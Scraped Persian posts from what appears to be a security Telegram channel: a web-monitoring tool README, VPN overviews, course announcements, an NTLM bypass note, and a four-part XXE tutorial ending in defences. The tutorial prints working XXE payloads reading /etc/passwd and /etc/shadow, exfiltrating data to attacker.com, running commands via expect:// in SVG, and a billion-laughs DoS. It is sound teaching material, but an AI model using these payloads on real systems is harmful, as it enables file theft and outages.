Try Hack Box

https://github.com/TryHackBox/Kaveh-WebDiff-Monitor توضیحات ابزار : این ابزار یک مانیتورینگ تغییرات و وضعیت HTTP است که برای بررسی سلامت سرویس‌های وب، مانیتورینگ Virtual Hostها و شناسایی تغییرات محتوا استفاده می‌شود. با استفاده از این اسکریپت می‌توانید چندین IP/Port/Schema/Vhost را به صورت دوره‌ای بررسی کنید و در صورت تغییر وضعیت پاسخ یا تغییر در محتوای صفحه، هشدار دریافت کنید. ویژگی‌ها نظارت زمان‌بندی‌شده: اجرای خودکار در بازه‌های زمانی مشخص. پشتیبانی از HTTP و HTTPS با امکان نادیده گرفتن خطاهای SSL. Virtual Host Routing: اتصال مستقیم به IP با هدر Host سفارشی (مناسب برای تست دامنه‌های روی یک سرور). بررسی تغییر محتوا بر اساس تعداد کلمات و کد وضعیت HTTP. ذخیره‌سازی وضعیت‌ها در فایل /tmp/http_mon.log برای مقایسه. قابل استفاده در تست نفوذ برای شناسایی تغییرات، از کار افتادن سرویس یا تغییرات مشکوک. نحوه اجرا در لینوکس 1. اسکریپت را کلون یا دانلود کنید:

   git clone https://github.com/TryHackBox/Kaveh-WebDiff-Monitor.git
   cd Kaveh-WebDiff-Monitor
   chmod +x Kaveh-Webdiff-Monitor.sh

2. یک فایل متنی شامل لیست اهداف ایجاد کنید (هر خط شامل IP، پورت، پروتکل و vhost):      192.168.1.10 443 https example.com    10.0.0.5 80 http test.local    3. اجرای اسکریپت:

   ./Kaveh-Webdiff-Monitor.sh targets.txt

   4. خروجی نمونه:    Fri Aug 15 23:45:05 UTC 2025    [*] 192.168.1.10 443 example.com: 200 157    [*] 10.0.0.5 80 test.local: 404 12    [!] تغییر وضعیت برای example.com    کاربرد در تست نفوذ در فرایند تست نفوذ، این ابزار می‌تواند نقش مهمی داشته باشد: شناسایی تغییرات در محتوای وب در زمان انجام حملات (مثلاً تغییر پیام خطا بعد از تزریق). نظارت مداوم Virtual Hostها برای پیدا کردن دامنه‌های در حال توسعه یا فعال شدن سرویس‌های مخفی. ردیابی پاسخ سرور بعد از تست‌های سنگین (مانند تست فشار یا ارسال حجم بالای درخواست ها). شناسایی قطع سرویس یا تغییر پیکربندی در زمان حملات Man-in-the-Middle یا Bypass WAF. کمک به فاز Post-Exploitation برای تشخیص تغییرات ایجادشده توسط شما یا تیم قرمز روی سیستم تارگت. نکات مسیر /tmp/http_mon.log در هر بار بوت ریست می‌شود؛ در صورت نیاز می‌توانید آن را به مسیر دائمی تغییر دهید. برای استفاده در شبکه‌های بزرگ یا اسکن همزمان چند صد تارگت، پیشنهاد می‌شود بازه زمانی (INTERVAL) را متناسب افزایش دهید تا فشار روی سیستم تارگت کم شود. این ابزار نیاز به curl و محیط Bash دارد. اگر این ابزار براتون مفید بود استارز یادتون نشه @TryHackBox

https://github.com/TryHackBox/Kaveh-WebDiff-Monitor توضیحات ابزار : این ابزار یک مانیتورینگ تغییرات و وضعیت HTTP است که برای بررسی سلامت سرویس‌های وب، مانیتورینگ Virtual Hostها و شناسایی تغییرات محتوا استفاده می‌شود. با استفاده از این اسکریپت می‌توانید چندین IP/Port/Schema/Vhost را به صورت دوره‌ای بررسی کنید و در صورت تغییر وضعیت پاسخ یا تغییر در محتوای صفحه، هشدار دریافت کنید. ویژگی‌ها نظارت زمان‌بندی‌شده: اجرای خودکار در بازه‌های زمانی مشخص. پشتیبانی از HTTP و HTTPS با امکان نادیده گرفتن خطاهای SSL. Virtual Host Routing: اتصال مستقیم به IP با هدر Host سفارشی (مناسب برای تست دامنه‌های روی یک سرور). بررسی تغییر محتوا بر اساس تعداد کلمات و کد وضعیت HTTP. ذخیره‌سازی وضعیت‌ها در فایل /tmp/http_mon.log برای مقایسه. قابل استفاده در تست نفوذ برای شناسایی تغییرات، از کار افتادن سرویس یا تغییرات مشکوک. نحوه اجرا در لینوکس 1. اسکریپت را کلون یا دانلود کنید:       git clone https://github.com/TryHackBox/Kaveh-WebDiff-Monitor.git    cd Kaveh-WebDiff-Monitor    chmod +x Kaveh-Webdiff-Monitor.sh    2. یک فایل متنی شامل لیست اهداف ایجاد کنید (هر خط شامل IP، پورت، پروتکل و vhost):       192.168.1.10 443 https example.com    10.0.0.5 80 http test.local    3. اجرای اسکریپت:       ./Kaveh-Webdiff-Monitor.sh targets.txt    4. خروجی نمونه:       Fri Aug 15 23:45:05 UTC 2025    [*] 192.168.1.10 443 example.com: 200 157    [*] 10.0.0.5 80 test.local: 404 12    [!] تغییر وضعیت برای example.com    کاربرد در تست نفوذ در فرایند تست نفوذ، این ابزار می‌تواند نقش مهمی داشته باشد: شناسایی تغییرات در محتوای وب در زمان انجام حملات (مثلاً تغییر پیام خطا بعد از تزریق). نظارت مداوم Virtual Hostها برای پیدا کردن دامنه‌های در حال توسعه یا فعال شدن سرویس‌های مخفی. ردیابی پاسخ سرور بعد از تست‌های سنگین (مانند تست فشار یا ارسال حجم بالای درخواست ها). شناسایی قطع سرویس یا تغییر پیکربندی در زمان حملات Man-in-the-Middle یا Bypass WAF. کمک به فاز Post-Exploitation برای تشخیص تغییرات ایجادشده توسط شما یا تیم قرمز روی سیستم تارگت. نکات مسیر /tmp/http_mon.log در هر بار بوت ریست می‌شود؛ در صورت نیاز می‌توانید آن را به مسیر دائمی تغییر دهید. برای استفاده در شبکه‌های بزرگ یا اسکن همزمان چند صد تارگت، پیشنهاد می‌شود بازه زمانی (INTERVAL) را متناسب افزایش دهید تا فشار روی سیستم تارگت کم شود. این ابزار نیاز به curl و محیط Bash دارد. اگر این ابزار براتون مفید بود استارز یادتون نشه @TryHackBox

🔐 راهکارهای VPN و نکات کلیدی امنیتی ☁️ Cloud VPN کاربرد: اتصال ایمن به سرویس‌های ابری مانند AWS یا Azure امنیت: استفاده از احراز هویت دو مرحله‌ای و رمزنگاری قوی برای محافظت از داده‌های حساس 🔒 IPsec VPN کاربرد: ایجاد تونل امن بین دستگاه‌های ثابت (ادارات/شعب) امنیت: پیاده‌سازی IKEv2 با رمزنگاری AES-256 برای جلوگیری از استراق سمع 🌐 SSL VPN کاربرد: دسترسی امن از طریق مرورگر بدون نیاز به نصب کلاینت امنیت: فعالسازی احراز هویت چندعاملی و محدود کردن دسترسی بر اساس نقش کاربران 💻 Client-Based VPN کاربرد: اتصال ایمن کارمندان دورکار به شبکه سازمان امنیت: نصب آنتی‌ویرس روی کلاینت‌ها و استفاده از قابلیت Kill Switch 🏢 Site-to-Site VPN کاربرد: ارتباط امن بین دفاتر مختلف یک سازمان امنیت: مانیتورینگ مداوم ترافیک و استفاده از فایروال بین شبکه‌ها 🏠 Remote Access VPN کاربرد: دسترسی کارمندان به منابع داخلی از راه دور امنیت: محدود کردن دسترسی با Zero Trust و زمان‌بندی Sessionها 🔰 نکات طلایی امنیتی: ✅ همیشه از پروتکل‌های به‌روز (مانند WireGuard) استفاده کنید ✅ دسترسی VPN را فقط به IPهای مورد اعتماد محدود نمایید ✅ لاگ‌های اتصالات را به صورت مداوم بررسی کنید ✍️نویسنده @TryHackBox | The Chaos #NetworkSecurity #VPN #Cybersecurity #Networking

🔐 راهکارهای امن VPN و کاربردهای آنها ☁️ Cloud VPN کاربران را به منابع مبتنی بر فضای ابری متصل می‌کند. 🔒 IPsec VPN ارتباطات IP را از طریق تونل‌های امن رمزگذاری می‌کند. 🌐 SSL VPN دسترسی امن به شبکه را از طریق مرورگر فراهم می‌کند. 💻 Client-Based VPN برای دسترسی از راه دور، نیاز به نصب نرم‌افزار دارد. 🏢 Site-to-Site VPN شبکه‌های مختلف را برای ارتباط ایمن به هم متصل می‌کند. 🏠 Remote Access VPN کاربران را به شبکه‌های خصوصی متصل می‌کند. 💡 نکته کلیدی: انتخاب نوع مناسب VPN (برای دورکاری، اتصال شعب یا یکپارچه‌سازی با ابر) می‌تواند استراتژی امنیتی شما را متحول کند! ✍️نویسنده @TryHackBox | The Chaos #NetworkSecurity #VPN #Cybersecurity #Networking

آزمایشگاه سایبرنتیک «آیو» به رهبری میلاد کهساری الهادی، تاکنون دوره‌های آموزشی ارزشمندی را به‌صورت رایگان برگزار کرده است که فرصتی منحصربه‌فرد برای یادگیری فراهم می‌آورد. دوره Unlocking Machine این دوره به شما می‌آموزد چگونه یک مسئله را شناسایی و تحلیل کنید، سپس با استفاده از روش‌های پژوهشی به راه‌حل‌های علمی و عملی برسید. در ادامه، یاد می‌گیرید چگونه این راه‌حل را در قالب یک محصول یا ابزار نرم‌افزاری پیاده‌سازی کنید. هدف دوره، پرورش توانایی حل مسئله از ایده تا اجرا، بر پایه‌ی رویکردی پژوهش‌محور و خلاقانه است. دوره The Polyglot Mind در این دوره با پارادایم‌های گوناگون برنامه‌نویسی آشنا می‌شوید و می‌آموزید یک مسئله را از چند زاویه متفاوت بررسی و حل کنید. این نگاه چندپارادایمی باعث می‌شود در مواجهه با چالش‌های پیچیده، انعطاف‌پذیرتر و خلاق‌تر باشید. همچنین، دوره‌های دیگری نیز در حال برگزاری هستند. با شرکت در این دوره‌ها، می‌توانید به‌صورت رایگان مهارت‌های تخصصی مانند مهندسی معکوس، کشف آسیب‌پذیری و توسعه اکسپلویت را فرا بگیرید و در کنار آن، توانایی طراحی و توسعه سامانه‌های دفاعی را نیز به دست آورید. https://t.me/aioooir https://www.aparat.com/academy_aiooo https://www.youtube.com/@aioooir

درود خدمت دوستان گرامی بنده اینجا روی حملات اکتیو دایرکتوری و مباحث ردتیم تمرکز خواهم کرد و سناریوهای APT هکرها و معرفی و اطلاعات جامع در مورد پروتکل ها و موارد دیگر که تجربه بنده هست رو در اختیار شما عزیزان قرار میدهم . @KavehAPT

📌 حملات XXE (تزریق XML) - بخش چهارم (پایانی)  🔹 روش‌های پیشگیری و دفاع در برابر XXE  1. غیرفعال کردن پردازش موجودیت‌های خارجی (External Entities)  در اکثر پردازشگرهای XML (مثل PHP, Java, .NET)، می‌توان این ویژگی را غیرفعال کرد:  مثال در PHP: 

libxml_disable_entity_loader(true);

مثال در Python (lxml): 

parser = etree.XMLParser(resolve_entities=False)

2. استفاده از Whitelisting برای ورودی‌های XML  - فقط اجازه‌دهید المان‌ها و attributeهای مورد اعتماد پردازش شوند.  - از اسکیماهای معتبر (XSD) برای اعتبارسنجی ساختار XML استفاده کنید.  3. فیلتر کردن محتوای خطرناک  - بلوک کردن <!DOCTYPE و <!ENTITY در ورودی کاربر.  - مسدود کردن پروتکل‌های خطرناک مثل file://, php://, expect://.  4. به‌روزرسانی کتابخانه‌های پردازش XML  بسیاری از آسیب‌پذیری‌های XXE در نسخه‌های قدیمی کتابخانه‌ها (مثل libxml2) وجود دارند.  5. استفاده از فرمت‌های جایگزین (JSON به جای XML)  در بسیاری از موارد، استفاده از JSON به جای XML می‌تواند خطر XXE را حذف کند.  🔹 نتیجه‌گیری  حملات XXE می‌توانند منجر به خواندن فایل‌های حساس، حملات SSRF و حتی اختلال در سرویس (DoS) شوند. با غیرفعال کردن موجودیت‌های خارجی و اعتبارسنجی دقیق ورودی‌ها، می‌توان از این حملات جلوگیری کرد.  ✅ امن‌تر کدنویسی کنید! ✅  ✍️نویسنده @TryHackBox | The Chaos #XXE #Prevention #CyberSecurity

#سوال : در هدر IPv4، فیلد TTL چیکار میکنه و چرا در تست نفوذ مهمه ؟

سؤال ۱: در هدر IPv4، فیلد TTL چیکار میکنه و چرا در تست نفوذ مهمه ؟

برگزاری جلسه ویس چت :  مهندس میلاد کهساری با سلام خدمت دوستان و همراهان عزیز،  در راستای ارتقای سطح دانش فنی و آشنایی بیشتر با مباحث امنیت سایبری، قصد داریم جلسه‌ای تخصصی و آموزشی در خصوص مهندسی معکوس و کشف آسیب پذیری و توسعه محصولات دیفنسیو  به صورت ویس چت برگزار کنیم. 🎙️ مهمان ویژه:  مهندس میلاد کهساری 📅 زمان برگزاری: پنجشنبه 1404/05/23 📍 پلتفرم: تلگرام (ویس چت) 🕗 ساعت : 19:00 💬 سوالات خود را درباره مهندسی معکوس و کشف آسیب پذیری و توسعه محصولات دیفنسیو در کامنت‌هاارسال کنید تا در جلسه به آن‌ها پرداخته شود. 🔔 نکته مهم:  جهت شرکت به موقع جلسه، حتماً کانال تلگرام را چک کنید تا از این جلسه جا نمونید . @RadioZeroPod @TryHackBox

📌 حملات XXE (تزریق XML) - بخش سوم  🔹 حملات پیشرفته XXE (ادامه)  4. استفاده از XXE در فایل‌های SVG (حملات از طریق تصاویر)  فایل‌های SVG مبتنی بر XML هستند و می‌توانند حاوی payloadهای XXE باشند: 

<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" height="200">
    <image xlink:href="expect://id"></image>
</svg>

اگر سایتی آپلود SVG را بدون فیلتر کردن اجازه دهد، این payload می‌تواند دستورات سیستم را اجرا کند.  5. استفاده از XXE در پروتکل SOAP (سرویس‌های وب)  در APIهای SOAP-based نیز می‌توان از XXE سوءاستفاده کرد: 

<soap:Body>
  <foo>
    <![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://attacker.com/"> %dtd;]><xxx/>]]>
  </foo>
</soap:Body>

این payload درخواستی به سرور مهاجم ارسال می‌کند.  6. استفاده از کدگذاری UTF-7 برای دور زدن فیلترها  بعضی سیستم‌ها فقط UTF-8 را پردازش می‌کنند، اما با UTF-7 می‌توان برخی فیلترها را دور زد: 

<?xml version="1.0" encoding="UTF-7"?>
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hacker.com/+ACI +AD4AXQA+
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4

🔹 جمع‌بندی بخش سوم  - درون SVGها می‌توانند حاوی XXE باشند.  -حتی APIهای SOAP نیز در معرض خطرند.  - با تغییر کدگذاری (مثل UTF-7) می‌توان برخی فیلترها را دور زد.  ادامه در بخش چهارم (پیشگیری و دفاع)... ✍️نویسنده @TryHackBox | The Chaos #XXE #SVG #Payload #CyberSecurity

https://github.com/TryHackBox/Books/tree/main/Persian%20eLearnSecurity/eJPT کتاب Penetration Testing از موسسه eLearnSecurity به زبان پارسی . تیم TryHackBox بخش هایی از کتابهای دوره eJPT از موسسه eLearnSecurity را ترجمه کرده است. خوشحال میشویم اگر با دادن ستاره ⭐️ در گیت هاب از تلاش ما حمایت کنید تا بتوانیم ترجمه ی کتاب های بیشتری از این موسسه و سایر موسسات معتبر را به صورت رایگان در اختیار شما قرار دهیم. همراهی شما انگیزهی ما برای ارائه محتوای ارزشمندتر است! #eLearnSecurity @TryHackBox

https://github.com/TryHackBox/Books/tree/main/Persian%20eLearnSecurity/eJPT کتاب Penetration Testing از موسسه eLearnSecurity به زبان پارسی . تیم TryHackBox بخش هایی از کتابهای دوره eJPT از موسسه eLearnSecurity را ترجمه کرده است. خوشحال میشویم اگر با دادن ستاره ⭐️ در گیت هاب از تلاش ما حمایت کنید تا بتوانیم ترجمه ی کتاب های بیشتری از این موسسه و سایر موسسات معتبر را به صورت رایگان در اختیار شما قرار دهیم. همراهی شما انگیزهی ما برای ارائه محتوای ارزشمندتر است! #eLearnSecurity @TryHackBox

https://github.com/TryHackBox/Books/tree/main/Persian%20eLearnSecurity/eJPT کتاب Penetration Testing از موسسه eLearnSecurity به زبان پارسی . تیم TryHackBox بخش هایی از کتابهای دوره eJPT از موسسه eLearnSecurity را ترجمه کرده است. خوشحال میشویم اگر با دادن ستاره ⭐️ در گیت هاب از تلاش ما حمایت کنید تا بتوانیم ترجمه ی کتاب های بیشتری از این موسسه و سایر موسسات معتبر را به صورت رایگان در اختیار شما قرار دهیم. همراهی شما انگیزهی ما برای ارائه محتوای ارزشمندتر است! @TryHackBox

برگزاری جلسه ویس چت :  مهندس میلاد کهساری با سلام خدمت دوستان و همراهان عزیز،  در راستای ارتقای سطح دانش فنی و آشنایی بیشتر با مباحث امنیت سایبری، قصد داریم جلسه‌ای تخصصی و آموزشی در خصوص مهندسی معکوس و کشف آسیب پذیری و توسعه محصولات دیفنسیو  به صورت ویس چت برگزار کنیم. 🎙️ مهمان ویژه:  مهندس میلاد کهساری 📅 زمان برگزاری: پنجشنبه 1404/05/23 📍 پلتفرم: تلگرام (ویس چت) 🕗 ساعت : 19:00 💬 سوالات خود را درباره مهندسی معکوس و کشف آسیب پذیری و توسعه محصولات دیفنسیو در کامنت‌هاارسال کنید تا در جلسه به آن‌ها پرداخته شود. 🔔 نکته مهم:  جهت شرکت به موقع جلسه، حتماً کانال تلگرام را چک کنید تا از این جلسه جا نمونید . @RadioZeroPod @TryHackBox

Zero Click, One NTLM: Microsoft Security Patch Bypass (CVE-2025-50154) به مهاجم اجازه می‌دهد تا بدون هیچ تعامل کاربری، حتی روی سیستم‌های کاملاً پچ شده، هش‌های NTLM را استخراج کند. با exploiting از یک شکاف ظریف باقی‌مانده در راهکار کاهش آسیب، مهاجم می‌تواند درخواست‌های احراز هویت NTLM را به‌طور خودکار فعال کند و این امکان را برای حملات کرک آفلاین یا حملات relay فراهم می‌آورد تا دسترسی غیرمجاز کسب کند. @PfkSecurity

📌 حملات XXE (تزریق XML) - بخش دوم 🔹 حملات پیشرفته XXE 1. حملات Blind XXE (انتقال داده به صورت خارج از باند) در برخی موارد، برنامه پاسخ مستقیمی نشان نمی‌دهد، اما مهاجم می‌تواند داده‌ها را به یک سرور تحت کنترل خود منتقل کند. مثال:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "file:///etc/passwd">
  <!ENTITY blind SYSTEM "http://attacker.com/?%xxe;">
]>
<foo>&blind;</foo>

در این حالت، محتوای /etc/passwd به سرور مهاجم ارسال می‌شود. 2. دور زدن کنترل‌های دسترسی (PHP Example) با استفاده از فیلترهای PHP، می‌توان فایل‌های محدودشده را خواند:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY ac SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/shadow">
]>
<foo>&ac;</foo>

(در این مثال، فایل /etc/shadow به صورت base64 کدگذاری و خوانده می‌شود.) 3. حملات DoS با XXE بعضی از payloadهای XXE می‌توانند باعث مصرف بیش از حد منابع سرور شوند:

<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
  ...
]>
<lolz>&lol9;</lolz>

این حمله باعث ایجاد حجم زیادی از داده‌های تکراری و crash سرور می‌شود. ادامه در بخش سوم... ✍️نویسنده @TryHackBox | The Chaos #XXE #BlindAttack #CyberSecurity

📌 حملات XXE (تزریق XML) - بخش اول 🔹حمله XXE چیست؟ حملۀ XXE (XML External Entity Injection) یک آسیب‌پذیری امنیتی در پردازش داده‌های XML است که به مهاجم اجازه می‌دهد به فایل‌های سیستم سرور دسترسی پیدا کند یا با سیستم‌های backend تعامل داشته باشد. در برخی موارد، این آسیب‌پذیری می‌تواند منجر به حمله‌های جعل درخواست سمت سرور (SSRF) یا حتی اختلال در سرویس (DoS) شود. 🔹 انواع حملات XXE 1. استخراج فایل‌ها (مثلاً خواندن /etc/passwd) 2. حملات SSRF (ارسال درخواست به سیستم‌های داخلی) 3. انتقال داده‌ها به صورت خارج از باند (OOB) 4. استخراج داده از طریق پیام‌های خطا 🔹 مثال ساده از XXE:

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>

در این مثال، مهاجم محتوای فایل /etc/passwd را می‌خواند. ادامه در بخش بعدی... ✍️نویسنده @TryHackBox | The Chaos #XXE #SSRF #CyberSecurity